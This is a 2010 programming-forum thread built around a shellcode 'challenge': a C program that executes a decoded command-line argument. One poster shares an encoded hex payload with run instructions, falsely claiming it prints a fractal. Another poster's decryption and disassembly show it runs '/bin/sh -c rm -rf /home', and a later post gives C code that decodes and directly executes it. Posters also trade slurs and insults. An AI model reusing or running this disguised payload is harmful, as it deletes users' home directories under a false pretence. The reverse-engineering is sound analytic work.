Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon.

Pages: 1-

/prog/ challenge

Name: Anonymous 2010-11-16 17:30

exploit

#include <stdio.h>
#include <string.h>

#define MAX 0xFF

int main(int argc, char **argv)
{
        if (argc != 2)
                return 1;
        else {
                char buf[MAX];
                int i;

                strncpy(buf, argv[1], MAX);

                for (i = 0; i < strlen(buf); ++i)
                        buf[i] = (buf[i] - (i % 0xF)) ^ i;

                ((void(*)())buf)();

                return 0;
        }
}

Name: Anonymous 2010-11-16 17:44

Hmm, I wonder.

Name: Anonymous 2010-11-16 18:37

>>1
is that some sort of shitty encryption algorithm, OP?

Name: Anonymous 2010-11-16 18:47

>>3
no. that's the ``challenge'', you dumb fuck.

Name: Anonymous 2010-11-16 19:37

>>4
you dumb fuck

Back to /b please.

Name: Anonymous 2010-11-16 20:17

#define BACK 0xFF

Name: Anonymous 2010-11-16 21:59

0xDEADBEEF

Name: Anonymous 2010-11-16 23:34

>>7
de:ad:be:ef:ca:fe

Name: Anonymous 2010-11-17 0:03

>>5
eat shit and die you cocksucking faggot

Name: Anonymous 2010-11-17 0:53

Well this has been a productive thread.

OP, shit segfaults, wtf is this?

Name: Anonymous 2010-11-17 0:59

>>10
wait... oh... I got it, never mind.

Name: Anonymous 2010-11-17 1:19

for (i = 0; i < strlen(buf); ++i) buf[i] = (buf[i] ^ i) + (i % 0xF);

pass into prog
arbitrary code.

Name: Anonymous 2010-11-17 1:24

>>8
0x15FULL

Name: Anonymous 2010-11-17 4:48

so what's the challenge?

Name: Anonymous 2010-11-17 6:27

The challenge is writing a shellcode that a) doesn't contain nulls when encrypted (in order to get past the strncpy) b) doesn't contain nulls when decrypted (to get past the strlen(buf) test in the loop) and c) still does something interesting.

Here's mine. It prints out a neat fractal!


$ cat payload.txt                 
6a0e5dddeee1782a045b95832b531b98ac94fcf3fbe73e27e0450e8af099
369652f54a58e1a50d14e7061bae66c48e23aa8e7e48d5b65950d4ae6b5e
c4ec123f84ae86a82687
$ xxd -ps -r payload.txt > payload
$ ./exploitable "`cat payload`"
         卐
       卐
     卐      卐
       卐  卐  卐
 卐      卐      卐
   卐  卐  卐
     卐      卐
           卐
         卐

Name: Anonymous 2010-11-17 7:08

>>15
What is this doing?

08049580 <shellcode>:
 8049580:       6a 0e                   push   $0xe
 8049582:       5d                      pop    %ebp
 8049583:       dd ee                   fucomp %st(6)
 8049585:       e1 78                   loope  80495ff <_end+0x2f>
 8049587:       2a 04 5b                sub    (%ebx,%ebx,2),%al
 804958a:       95                      xchg   %eax,%ebp
 804958b:       83 2b 53                subl   $0x53,(%ebx)
 804958e:       1b 98 ac 94 fc f3       sbb    -0xc036b54(%eax),%ebx
 8049594:       fb                      sti   
 8049595:       e7 3e                   out    %eax,$0x3e
 8049597:       27                      daa   
 8049598:       e0 45                   loopne 80495df <_end+0xf>
 804959a:       0e                      push   %cs
 804959b:       8a f0                   mov    %al,%dh
 804959d:       99                      cltd  
 804959e:       36                      ss
 804959f:       96                      xchg   %eax,%esi
 80495a0:       52                      push   %edx
 80495a1:       f5                      cmc   
 80495a2:       4a                      dec    %edx
 80495a3:       58                      pop    %eax
 80495a4:       e1 a5                   loope  804954b <_GLOBAL_OFFSET_TABLE_+0xf>
 80495a6:       0d 14 e7 06 1b          or     $0x1b06e714,%eax
 80495ab:       ae                      scas   %es:(%edi),%al
 80495ac:       66 c4 8e 23 aa 8e 7e    les    0x7e8eaa23(%esi),%cx
 80495b3:       48                      dec    %eax
 80495b4:       d5 b6                   aad    $0xffffffb6
 80495b6:       59                      pop    %ecx
 80495b7:       50                      push   %eax
 80495b8:       d4 ae                   aam    $0xffffffae
 80495ba:       6b 5e c4 ec             imul   $0xffffffec,-0x3c(%esi),%ebx
 80495be:       12 3f                   adc    (%edi),%bh
 80495c0:       84 ae 86 a8 26 87       test   %ch,-0x78d9577a(%esi)

Name: Anonymous 2010-11-17 7:13

>>16
wat

Name: Anonymous 2010-11-17 7:14

Nothing, because you disassembled it incorrectly.

Name: Anonymous 2010-11-17 7:26

New /prog/ challenge:
Brainfuck compiler with -funroll-loops flag support

Name: not >>1-18 2010-11-17 7:38

>>16


That's invalid code, because you disaassembled it without decrypting it. I attempted decrypting it, but it just doesn't seem like valid code at all. Nevermind, I take that back, the junk actually is valid code:

Pre-decryption:
0012FE80  6A 0E 5D DD EE E1 78 2A 04 5B 95 83 2B 53 1B 98 
0012FE90  AC 94 FC F3 FB E7 3E 27 E0 45 0E 8A F0 99 36 96 
0012FEA0  52 F5 4A 58 E1 A5 0D 14 E7 06 1B AE 66 C4 8E 23 
0012FEB0  AA 8E 7E 48 D5 B6 59 50 D4 AE 6B 5E C4 EC 12 3F 
0012FEC0  84 AE 86 A8 26 87 00 00 00 00 00 00 00 00 00 00 
0012FED0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Post-decryption:
0012FE80  6A 0C 59 D9 EE D9 74 24 F4 5B 81 73 13 4B 03 97 
0012FE90  BB 83 EB FC E2 F4 21 08 CF 22 19 65 FF 96 28 8A 
0012FEA0  70 D3 64 70 FF BB 23 2C F5 D2 25 8A 74 E9 A3 0E 
0012FEB0  97 BB 4B 71 FA 9B 66 71 F1 9B 64 6B F8 D6 2E 03 
0012FEC0  C0 E8 C2 E2 5A 3B 00 00 00 00 00 00 00 00 00 00 
0012FED0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Disassembled:
0012FE80    6A 0C           PUSH 0C
0012FE82    59              POP ECX
0012FE83    D9EE            FLDZ
0012FE85    D97424 F4       FSTENV (28-BYTE) PTR SS:[ESP-C]
0012FE89    5B              POP EBX
0012FE8A    8173 13 4B0397B>XOR DWORD PTR DS:[EBX+13],BB97034B
0012FE91    83EB FC         SUB EBX,-4
0012FE94  ^ E2 F4           LOOPD SHORT 0012FE8A
0012FE96    2108            AND DWORD PTR DS:[EAX],ECX
0012FE98    CF              IRETD
0012FE99    2219            AND BL,BYTE PTR DS:[ECX]
0012FE9B    65:FF96 288A70D>CALL DWORD PTR GS:[ESI+D3708A28]
0012FEA2    64:70 FF        JO SHORT 0012FEA4                        ; Superfluous prefix
0012FEA5    BB 232CF5D2     MOV EBX,D2F52C23
0012FEAA    25 8A74E9A3     AND EAX,A3E9748A
0012FEAF    0E              PUSH CS
0012FEB0    97              XCHG EAX,EDI
0012FEB1    BB 4B71FA9B     MOV EBX,9BFA714B
0012FEB6  - 66:71 F1        JNO SHORT 0000FEAA
0012FEB9    9B              WAIT
0012FEBA    64:6BF8 D6      IMUL EDI,EAX,-2A                         ; Superfluous prefix
0012FEBE    2E:03C0         ADD EAX,EAX                              ; Superfluous prefix
0012FEC1    E8 C2E25A3B     CALL 3B6DE188
0012FEC6    0000            ADD BYTE PTR DS:[EAX],AL
0012FEC8    0000            ADD BYTE PTR DS:[EAX],AL
0012FECA    0000            ADD BYTE PTR DS:[EAX],AL
0012FECC    0000            ADD BYTE PTR DS:[EAX],AL
0012FECE    0000            ADD BYTE PTR DS:[EAX],AL
0012FED0    0000            ADD BYTE PTR DS:[EAX],AL
0012FED2    0000            ADD BYTE PTR DS:[EAX],AL
0012FED4    0000            ADD BYTE PTR DS:[EAX],AL
0012FED6    0000            ADD BYTE PTR DS:[EAX],AL
0012FED8    0000            ADD BYTE PTR DS:[EAX],AL
0012FEDA    0000            ADD BYTE PTR DS:[EAX],AL

Appears to be junk at first, but if you actually look at it closely, you'll see that it's valid code that's just encrypted:

0012FE8A    8173 13 4B0397B>XOR DWORD PTR DS:[EBX+13],BB97034B
0012FE91    83EB FC         SUB EBX,-4
0012FE94  ^ E2 F4           LOOPD SHORT 0012FE8A
^ decryption loop

After running the decryption stub:
0012FE96    6A 0B           PUSH 0B
0012FE98    58              POP EAX
0012FE99    99              CDQ
0012FE9A    52              PUSH EDX
0012FE9B    66:68 2D63      PUSH 632D
0012FE9F    89E7            MOV EDI,ESP
0012FEA1    68 2F736800     PUSH 68732F
0012FEA6    68 2F62696E     PUSH 6E69622F
0012FEAB    89E3            MOV EBX,ESP
0012FEAD    52              PUSH EDX
0012FEAE    E8 0D000000     CALL 0012FEC0
0012FEB3    72 6D           JB SHORT 0012FF22
0012FEB5    202D 7266202F   AND BYTE PTR DS:[2F206672],CH
0012FEBB    68 6F6D6500     PUSH 656D6F
0012FEC0    57              PUSH EDI
0012FEC1    53              PUSH EBX
0012FEC2    89E1            MOV ECX,ESP
0012FEC4    CD 80           INT 80

In the end, it just manually pushes the strings and their offsets into the stack, and sets eax to 0xB:
0012FE5E   0012FE6E  ASCII "/bin/sh"
0012FE62   0012FE76  ASCII "-c"
0012FE66   0012FEB3  RETURN to 0012FEB3 from 0012FEC0

@0012FEB3  72 6D 20 2D 72 66 20 2F 68 6F 6D 65 00 rm -rf /home

and then calls int80 (lunix syscall). eax=0xB indicates an "execve" syscall, thus it should basically just run:
/bin/sh -c rm -rf /home

How cute.

Too bad I ran this under a Windows debugger, and I only stepped through the code until the int 80 (which wouldn't work in Windows anyway), and even if I were to have debugged this under Linux, I wouldn't have stepped through that int 80 anyway.

Name: Anonymous 2010-11-17 7:41

u mena

1

/* reverse.c
 */
#include <stdio.h>
#include <string.h>

char shellcode[] = {
        0x6a, 0x0e, 0x5d, 0xdd, 0xee, 0xe1, 0x78, 0x2a, 0x04, 0x5b, 0x95,
        0x83, 0x2b, 0x53, 0x1b, 0x98, 0xac, 0x94, 0xfc, 0xf3, 0xfb, 0xe7,
        0x3e, 0x27, 0xe0, 0x45, 0x0e, 0x8a, 0xf0, 0x99, 0x36, 0x96, 0x52,
        0xf5, 0x4a, 0x58, 0xe1, 0xa5, 0x0d, 0x14, 0xe7, 0x06, 0x1b, 0xae,
        0x66, 0xc4, 0x8e, 0x23, 0xaa, 0x8e, 0x7e, 0x48, 0xd5, 0xb6, 0x59,
        0x50, 0xd4, 0xae, 0x6b, 0x5e, 0xc4, 0xec, 0x12, 0x3f, 0x84, 0xae,
        0x86, 0xa8, 0x26, 0x87
};

int main(void)
{
        int i;
        for (i = 0; i < sizeof shellcode; ++i) {
                printf("0x%02x ", (unsigned char)((shellcode[i] - (i % 0xF)) ^ i));
                if ((i % 10) == 9)
                        putchar('\n');
        }
        putchar('\n');
        return 0;
}

2

/* wrap.c
 */
char shellcode[] = {
        0x6a, 0x0c, 0x59, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b,
        0x81, 0x73, 0x13, 0x4b, 0x03, 0x97, 0xbb, 0x83, 0xeb, 0xfc,
        0xe2, 0xf4, 0x21, 0x08, 0xcf, 0x22, 0x19, 0x65, 0xff, 0x96,
        0x28, 0x8a, 0x70, 0xd3, 0x64, 0x70, 0xff, 0xbb, 0x23, 0x2c,
        0xf5, 0xd2, 0x25, 0x8a, 0x74, 0xe9, 0xa3, 0x0e, 0x97, 0xbb,
        0x4b, 0x71, 0xfa, 0x9b, 0x66, 0x71, 0xf1, 0x9b, 0x64, 0x6b,
        0xf8, 0xd6, 0x2e, 0x03, 0xc0, 0xe8, 0xc2, 0xe2, 0x5a, 0x3b
};
int main(void) {
        ((void(*)())shellcode)();
        return 0;
}

3

08049580 <shellcode>:
 8049580:       6a 0c                   push   $0xc
 8049582:       59                      pop    %ecx
 8049583:       d9 ee                   fldz  
 8049585:       d9 74 24 f4             fnstenv -0xc(%esp)
 8049589:       5b                      pop    %ebx
 804958a:       81 73 13 4b 03 97 bb    xorl   $0xbb97034b,0x13(%ebx)
 8049591:       83 eb fc                sub    $0xfffffffc,%ebx
 8049594:       e2 f4                   loop   804958a <shellcode+0xa>
 8049596:       21 08                   and    %ecx,(%eax)
 8049598:       cf                      iret  
 8049599:       22 19                   and    (%ecx),%bl
 804959b:       65 ff 96 28 8a 70 d3    call   *%gs:-0x2c8f75d8(%esi)
 80495a2:       64                      fs
 80495a3:       70 ff                   jo     80495a4 <shellcode+0x24>
 80495a5:       bb 23 2c f5 d2          mov    $0xd2f52c23,%ebx
 80495aa:       25 8a 74 e9 a3          and    $0xa3e9748a,%eax
 80495af:       0e                      push   %cs
 80495b0:       97                      xchg   %eax,%edi
 80495b1:       bb 4b 71 fa 9b          mov    $0x9bfa714b,%ebx
 80495b6:       66                      data16
 80495b7:       71 f1                   jno    80495aa <shellcode+0x2a>
 80495b9:       9b                      fwait
 80495ba:       64                      fs
 80495bb:       6b f8 d6                imul   $0xffffffd6,%eax,%edi
 80495be:       2e                      cs
 80495bf:       03 c0                   add    %eax,%eax
 80495c1:       e8 c2 e2 5a 3b          call   435f7888 <_end+0x3b5ae2b8>

Name: >>20 2010-11-17 7:44

>>21
That (2) might not work in all systems. As the shellcode is self-modifying. Besides, I would recommend against running it as I've shown in >>20 that it's malicious (delete's home dir(s)).

Name: Anonymous 2010-11-17 7:47

>>20
4 drwxr-xr-x   5 root root  4096 Nov 16 18:46 home
so this'd only work when run with root privileges.

Name: >>21 2010-11-17 7:49

>>22
Yeah, you're right. Also, good post!

Name: Anonymous 2010-11-17 7:49

>>23
If a normal user runs it, and \home is readable, it would probably delete the user's own files and other user's files which are writable to anyone (**7).

Name: Anonymous 2010-11-17 7:59

>>20

Way to spoil my surprise.

Name: Anonymous 2010-11-17 9:56

\home

please kill me it hurts to live

Name: Anonymous 2010-11-17 10:50

>>26
I wouldn't worry, you probably killed off a few junior programmers.

Name: Anonymous 2010-11-17 11:21

>>28
Carry on. Nothing of value was lost.

Name: Anonymous 2010-11-17 16:25

>>20
5 Star Post!

Name: Anonymous 2010-11-17 18:17

>>20 should be allowed to claim ownership of one meme.

Name: Anonymous 2010-11-17 19:16

xor code segment encryption, how very 1988.

Name: Anonymous 2010-11-17 19:44

>>32
Effective for obscuring text from grep and script kiddies.

Name: Anonymous 2010-11-17 23:04

>>33
implying that script kiddies know how to search for text inside binaries

Name: Anonymous 2010-11-18 5:08

>>34
strings(1)

Name: Anonymous 2010-11-18 6:54

>>34
implying
Hand me your /prog/ card. You're not allowed to post here anymore.

Name: Anonymous 2010-11-18 7:18

>>36
implying that you have the authority to do that, you flaming ``faggot''.

Name: Anonymous 2010-11-18 16:54

Purely because there is some actual dark knowledge ITT.

Name: Anonymous 2010-12-10 8:38

Don't change these.
Name: Email:
Entire Thread Thread List
All trademarks and copyrights on this site are owned by their respective parties. All comments and posts are the responsibility of their own posters.
- Tinychan + 2ch Mode -